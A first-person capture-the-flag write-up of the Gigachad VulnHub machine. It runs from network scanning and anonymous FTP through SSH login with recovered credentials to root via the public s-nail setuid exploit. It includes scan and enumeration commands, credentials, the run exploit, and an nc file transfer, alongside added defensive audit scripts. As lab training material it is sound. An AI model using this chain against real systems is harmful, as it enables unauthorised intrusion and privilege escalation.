CTF-gigachad

  1. CTF-gigachad
    1. Discovery
    2. Discovery and Scanning
      1. netdiscover
      2. nmap
      3. port 80
        1. Dirbuster
        2. Hash
      4. port 21
      5. Port 22
    3. Vulnerability Assessment
      1. Find perms
      2. Exploit

CTF-gigachad

Discovery

Link: vulnhub-GIGACHAD
The only information we have is that there are multiple flags.

Discovery and Scanning

netdiscover

Fast scan with netdiscover.

sudo netdiscover -r 192.168.0.0/16
_____________________________________________________________________________               
  IP            At MAC Address     Count     Len  MAC Vendor / Hostname                     
---------------------------------------------------------------------------- 
192.168.0.19    08:00:27:d0:52:bc      1      42  PCS Systemtechnik GmbH

nmap

sudo nmap -sV -p- 192.168.0.19
Nmap scan report for 192.168.0.19
Host is up (0.00010s latency).
Not shown: 65532 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
MAC Address: 08:00:27:D0:52:BC (Oracle VirtualBox virtual NIC)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Ports 21, 22 and 80 are open, and it's a Debian machine.

port 80

Let's go to http://192.168.0.19 and see what we can find.
With the inspector (F12) I found a key:
A7F9B77C16A3AA80DAA4E378659226F628326A95 D82D10564866FD9B201941BCC6C94022196F8EE8

Dirbuster

I ran DirBuster with a common wordlist:
dirbuster -u http://192.168.0.19/ -l Wordlist-common.txt
Oh… it found 500 directories. I stopped the scan, it's useless.

Hash

It's a SHA-1 hash:
a7f9b77c16a3aa80daa4e378659226f628326a95 = fuck you
D82D10564866FD9B201941BCC6C94022196F8EE8 = VIRGIN
Maybe it's a password or a user.
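How one gets from "40 hex characters" to "SHA-1" and then confirms the stated preimage is worth making explicit. The following is an added example, not code from the write-up: a small Python script that classifies a hex token by digest length (length alone only yields candidates, so the table of candidate algorithms is the example's own assumption) and then checks whether a claimed plaintext really reproduces the digest. The two tokens and the two preimages used in the main block are the ones the page reports.

```python
import hashlib
import re
from typing import Dict, List, Optional

# Hex digest length -> algorithms that produce it. This table is an
# assumption of the example (a handful of common algorithms); length alone
# cannot distinguish SHA-1 from, say, RIPEMD-160, so it yields candidates.
LENGTH_TO_ALGOS: Dict[int, List[str]] = {
    32: ["md5"],
    40: ["sha1"],
    56: ["sha224"],
    64: ["sha256"],
    96: ["sha384"],
    128: ["sha512"],
}

HEX_RE = re.compile(r"^[0-9a-fA-F]+$")


def split_tokens(line: str) -> List[str]:
    """Pull hex-looking tokens out of a line such as the one found in the page
    source, ignoring anything that is not pure hex."""
    return [t for t in line.split() if HEX_RE.match(t)]


def guess_digest_algorithms(token: str) -> List[str]:
    """Return the candidate algorithms for a hex token, judged by its length."""
    token = token.strip()
    if not HEX_RE.match(token):
        return []
    return LENGTH_TO_ALGOS.get(len(token), [])


def confirm_preimage(token: str, claimed_plaintext: str) -> Optional[str]:
    """Hash `claimed_plaintext` with every candidate algorithm and return the
    name of the one that reproduces `token`, or None if none does.

    The comparison is case-insensitive because the page shows the same digest
    once in upper case and once in lower case.
    """
    expected = token.strip().lower()
    for algo in guess_digest_algorithms(expected):
        digest = hashlib.new(algo, claimed_plaintext.encode("utf-8")).hexdigest()
        if digest == expected:
            return algo
    return None


if __name__ == "__main__":
    # The two tokens as they appeared in the page source, paired with the
    # preimages the write-up states for them.
    page_line = ("A7F9B77C16A3AA80DAA4E378659226F628326A95 "
                 "D82D10564866FD9B201941BCC6C94022196F8EE8")
    claims = {
        "A7F9B77C16A3AA80DAA4E378659226F628326A95": "fuck you",
        "D82D10564866FD9B201941BCC6C94022196F8EE8": "VIRGIN",
    }
    for tok in split_tokens(page_line):
        print(tok, guess_digest_algorithms(tok),
              "confirmed as:", confirm_preimage(tok, claims[tok]))
```

`confirm_preimage` returns the algorithm name rather than a bare boolean so that a caller can record which candidate actually matched; with a 40-character token there is only one candidate in this table, but the function is written for the general case.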

I have all I need, so I can move on to the FTP part.

port 21

ftp 192.168.0.19
bash: ftp : commande introuvable
Oh, I use Arch BTW (and I'm French).
sudo pacman -S inetutils
Now we can play.
ftp 192.168.0.19
user: anonymous
password: password

230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp>
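The anonymous login above is the weak spot of this service: vsftpd's compiled-in default for anonymous_enable is YES, so a box whose vsftpd.conf never mentions the option, or sets it explicitly as the target does, accepts anonymous/anything. As an added example (not part of the write-up), here is a small vsftpd.conf parser and audit in Python that reports the effective value of the anonymous-access options against a hardening policy; the two sample configs are constructed, and the policy values are the example's own assumption.

```python
from typing import Dict, List, Tuple

# vsftpd.conf options this audit looks at, with vsftpd's compiled-in default
# for each (per the vsftpd.conf man page) and the value this example's
# policy requires. The policy column is an assumption of the example.
VSFTPD_DEFAULTS: Dict[str, str] = {
    "anonymous_enable": "YES",
    "anon_upload_enable": "NO",
    "anon_mkdir_write_enable": "NO",
    "write_enable": "NO",
}
POLICY: Dict[str, str] = {
    "anonymous_enable": "NO",
    "anon_upload_enable": "NO",
    "anon_mkdir_write_enable": "NO",
    "write_enable": "NO",
}


def parse_vsftpd_conf(text: str) -> Dict[str, str]:
    """Parse the vsftpd.conf format: one option=value per line, '#' comments,
    blank lines. Boolean values are upper-cased since vsftpd accepts either."""
    settings: Dict[str, str] = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" not in line:
            continue
        key, value = line.split("=", 1)
        settings[key.strip()] = value.strip().upper()
    return settings


def audit_vsftpd(text: str) -> List[Tuple[str, str, str]]:
    """Return (option, effective value, required value) for every policy
    violation. An option missing from the file takes vsftpd's default, which
    is why a config that never mentions anonymous_enable is still flagged."""
    settings = parse_vsftpd_conf(text)
    findings = []
    for key, required in POLICY.items():
        effective = settings.get(key, VSFTPD_DEFAULTS[key])
        if effective != required:
            findings.append((key, effective, required))
    return findings


# Constructed sample configs: the first resembles what the target must be
# running (anonymous login succeeded), the second is the hardened form.
WEAK_CONF = """\
listen=YES
anonymous_enable=YES
local_enable=YES
write_enable=NO
"""

HARDENED_CONF = """\
listen=YES
anonymous_enable=NO
local_enable=YES
write_enable=NO
"""

if __name__ == "__main__":
    for name, conf in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(name, audit_vsftpd(conf))
```

Run it on a real host with `audit_vsftpd(open("/etc/vsftpd.conf").read())`; the important design point is that an absent option is judged by the daemon's default rather than being ignored, since the default is what the target is actually running with.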

I'm in, let's see what we have with ls.

-r-xr-xr-x    1 1000     1000          297 Feb 07 17:33 chadinfo

Good, I have to read it.
Download it: ftp> get chadinfo
Read it: cat chadinfo
(The PK at the top of the output is the zip file signature: chadinfo is a zip archive, and the text inside is readable with cat only because it was stored uncompressed.)

PK
0
 HR���ƃchadinfoUT	�j `Zj `ux
                                  why yes,
#######################
username is chad
???????????????????????
password?
!!!!!!!!!!!!!!!!!!!!!!!
go to /drippinchad.png
PK
0
 HR���ƃ��chadinfoUT�j `ux
                         PKN�

User: chad
Password: in the image drippinchad.png
http://192.168.0.19/drippinchad.png

I'll use Google Images to find out where it is.
It's the Maiden's Tower; that should be the password.
After multiple attempts, the password is maidenstower.

I'm connected as chad:
there is the ftp directory with chadinfo,
and also user.txt.
I download and read it.

flag 1/2
░░░░░░▄▄▄▄▀▀▀▀▀▀▀▀▄▄▄▄▄▄▄
░░░░░█░░░░░░░░░░░░░░░░░░▀▀▄
░░░░█░░░░░░░░░░░░░░░░░░░░░░█
░░░█░░░░░░▄██▀▄▄░░░░░▄▄▄░░░░█
░▄▀░▄▄▄░░█▀▀▀▀▄▄█░░░██▄▄█░░░░█
█░░█░▄░▀▄▄▄▀░░░░░░░░█░░░░░░░░░█
█░░█░█▀▄▄░░░░░█▀░░░░▀▄░░▄▀▀▀▄░█
░█░▀▄░█▄░█▀▄▄░▀░▀▀░▄▄▀░░░░█░░█
░░█░░░▀▄▀█▄▄░█▀▀▀▄▄▄▄▀▀█▀██░█
░░░█░░░░██░░▀█▄▄▄█▄▄█▄▄██▄░░█
░░░░█░░░░▀▀▄░█░░░█░█▀█▀█▀██░█
░░░░░▀▄░░░░░▀▀▄▄▄█▄█▄█▄█▄▀░░█
░░░░░░░▀▄▄░░░░░░░░░░░░░░░░░░░█
░░░░░█░░░░▀▀▄▄░░░░░░░░░░░░░░░█
░░░░▐▌░░░░░░█░▀▄▄▄▄▄░░░░░░░░█
░░███░░░░░▄▄█░▄▄░██▄▄▄▄▄▄▄▄▀
░▐████░░▄▀█▀█▄▄▄▄▄█▀▄▀▄
░░█░░▌░█░░░▀▄░█▀█░▄▀░░░█
░░█░░▌░█░░█░░█░░░█░░█░░█
░░█░░▀▀░░██░░█░░░█░░█░░█
░░░▀▀▄▄▀▀░█░░░▀▄▀▀▀▀█░░█

Nice, I think I'm done with the FTP. I'm going to sleep; I'll continue tomorrow.

Port 22

I'm back.

I'll try to connect over SSH with the previous creds:
User: chad
Password: maidenstower

ssh chad@192.168.0.19

I'm in!

I'm in his home directory; let's display what's in it:

ls -la

drwxr-xr-x 4 chad chad 4096 Jul 16 06:51 .
drwxr-xr-x 3 root root 4096 Feb  7 14:57 ..
dr-xr-xr-x 2 chad chad 4096 Feb  7 16:41 ftp
drwx------ 3 chad chad 4096 Jul 16 06:51 .gnupg
-r-x------ 1 chad chad 1805 Jan  3  2021 user.txt

.gnupg seems interesting.

It contains the directory private-keys-v1.d, but it's empty.

Vulnerability Assessment

Find perms

From the Hausec pentest cheatsheet:
Find binaries that execute as their owner (setuid):
find / -perm -u=s -type f 2>/dev/null
This is what I found:

/usr/lib/openssh/ssh-keysign
/usr/lib/s-nail/s-nail-privsep
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/bin/passwd
/usr/bin/mount
/usr/bin/chfn
/usr/bin/umount
/usr/bin/newgrp
/usr/bin/su
/usr/bin/gpasswd
/usr/bin/chsh

s-nail looks interesting:
s-nail -V → v14.8.6

Exploit

I found this on Exploit Database:
S-nail < 14.8.16 - Local Privilege Escalation
Is 14.8.6 14.8.60 or 14.8.06?
Let's try it.
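Two things in the last two sections are worth turning into a repeatable check from the defender's side: the setuid listing (an unexpected setuid helper such as s-nail-privsep only stands out if you compare against a known-good baseline) and the version question (14.8.6 is neither 14.8.60 nor 14.8.06; version components compare as integers, so 6 < 16 and the version is below the 14.8.16 named in the advisory title). The following is an added example, not code from the write-up: a Python audit that walks the filesystem for setuid regular files, diffs the result against a baseline, and compares a version string against a fixed-in version. The baseline set is the example's assumption (the page's own list minus the s-nail helper); on a real host, generate it from a fresh reference install of the same release.

```python
import os
import re
import stat
from typing import Iterable, List, Set, Tuple

# Setuid binaries expected on a stock install. Assumption of this example:
# it is the page's find output minus s-nail-privsep.
SUID_BASELINE: Set[str] = {
    "/usr/lib/openssh/ssh-keysign",
    "/usr/lib/dbus-1.0/dbus-daemon-launch-helper",
    "/usr/lib/eject/dmcrypt-get-device",
    "/usr/bin/passwd",
    "/usr/bin/mount",
    "/usr/bin/chfn",
    "/usr/bin/umount",
    "/usr/bin/newgrp",
    "/usr/bin/su",
    "/usr/bin/gpasswd",
    "/usr/bin/chsh",
}

# The find output exactly as the page shows it, used instead of walking the
# local filesystem so the script runs anywhere.
PAGE_FIND_OUTPUT = """\
/usr/lib/openssh/ssh-keysign
/usr/lib/s-nail/s-nail-privsep
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/bin/passwd
/usr/bin/mount
/usr/bin/chfn
/usr/bin/umount
/usr/bin/newgrp
/usr/bin/su
/usr/bin/gpasswd
/usr/bin/chsh
"""


def walk_suid(root: str = "/") -> List[str]:
    """Python equivalent of `find / -perm -u=s -type f 2>/dev/null`: regular
    files carrying the setuid bit, silently skipping unreadable directories."""
    found: List[str] = []
    for dirpath, _dirnames, filenames in os.walk(root, onerror=lambda _e: None):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)  # lstat: judge the file itself, not a link target
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                found.append(path)
    return found


def unexpected_suid(found: Iterable[str], baseline: Set[str] = SUID_BASELINE) -> List[str]:
    """Setuid files present on the host but absent from the baseline."""
    return sorted(set(found) - baseline)


def parse_version(text: str) -> Tuple[int, ...]:
    """'v14.8.6' -> (14, 8, 6). Components compare as integers, so 14.8.6 sorts
    before 14.8.16: the last component is simply 6, and 6 < 16."""
    return tuple(int(part) for part in re.findall(r"\d+", text))


def is_below(version: str, fixed_in: str) -> bool:
    """True when `version` is older than the release an advisory names."""
    return parse_version(version) < parse_version(fixed_in)


if __name__ == "__main__":
    # On a real host replace PAGE_FIND_OUTPUT.split() with walk_suid("/").
    print("not in baseline:", unexpected_suid(PAGE_FIND_OUTPUT.split()))
    print("s-nail v14.8.6 below 14.8.16:", is_below("v14.8.6", "14.8.16"))
```

The baseline comparison is what makes the listing actionable: every other entry on the page's list is a standard Debian setuid binary, so the only line that needs an explanation is the one the diff leaves over. The version helper deliberately parses only the numeric components; if a package uses suffixes such as "-rc1", extend `parse_version` before trusting the comparison.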

touch exploit.sh
vi exploit.sh
Paste this: https://www.exploit-db.com/raw/47172
Escape, :wq.
chmod +x exploit.sh
./exploit.sh
Result:

[-] Failed. Not vulnerable?
[.] Cleaning up...
[-] Failed

This is the only exploit on Exploit Database; what did I do wrong?
I'm trying to download the file on the chad machine, but the terminal is so buggy.
I'll use scp to send it the file instead:
scp 47172.sh chad@192.168.0.19:/tmp/exploit.sh
Type the password: maidenstower
I have to run it with bash because ./ doesn't work, and I have too many errors now.
I think the machine is broken, or maybe my shell;
I have some errors, and it's my first CTF with this machine.
I fixed it with this here.
So I ran the script and it failed again, so I spammed it, and I'm in!


I'll change my shell to /bin/bash.
I'm root, so let's see what is in the /root/ directory.

# cat root.txt  
flag 2/2
░░░░░░▄▄▄▄▀▀▀▀▀▀▀▀▄▄▄▄▄▄▄
░░░░░█░░░░░░░░░░░░░░░░░░▀▀▄
░░░░█░░░░░░░░░░░░░░░░░░░░░░█
░░░█░░░░░░▄██▀▄▄░░░░░▄▄▄░░░░█
░▄▀░▄▄▄░░█▀▀▀▀▄▄█░░░██▄▄█░░░░█
█░░█░▄░▀▄▄▄▀░░░░░░░░█░░░░░░░░░█
█░░█░█▀▄▄░░░░░█▀░░░░▀▄░░▄▀▀▀▄░█
░█░▀▄░█▄░█▀▄▄░▀░▀▀░▄▄▀░░░░█░░█
░░█░░░▀▄▀█▄▄░█▀▀▀▄▄▄▄▀▀█▀██░█
░░░█░░░░██░░▀█▄▄▄█▄▄█▄▄██▄░░█
░░░░█░░░░▀▀▄░█░░░█░█▀█▀█▀██░█
░░░░░▀▄░░░░░▀▀▄▄▄█▄█▄█▄█▄▀░░█
░░░░░░░▀▄▄░░░░░░░░░░░░░░░░░░░█
░░▐▌░█░░░░▀▀▄▄░░░░░░░░░░░░░░░█
░░░█▐▌░░░░░░█░▀▄▄▄▄▄░░░░░░░░█
░░███░░░░░▄▄█░▄▄░██▄▄▄▄▄▄▄▄▀
░▐████░░▄▀█▀█▄▄▄▄▄█▀▄▀▄
░░█░░▌░█░░░▀▄░█▀█░▄▀░░░█
░░█░░▌░█░░█░░█░░░█░░█░░█
░░█░░▀▀░░██░░█░░░█░░█░░█
░░░▀▀▄▄▀▀░█░░░▀▄▀▀▀▀█░░█

congratulations!

Nice, the CTF is over; it was easy.
There is an image; I'll download it:
Receiver machine: nc -l -p 1234 > chad.png
Sender machine: nc -w 3 192.168.0.16 1234 < chad.png

This is the end. I hope you liked it; it was my first writeup.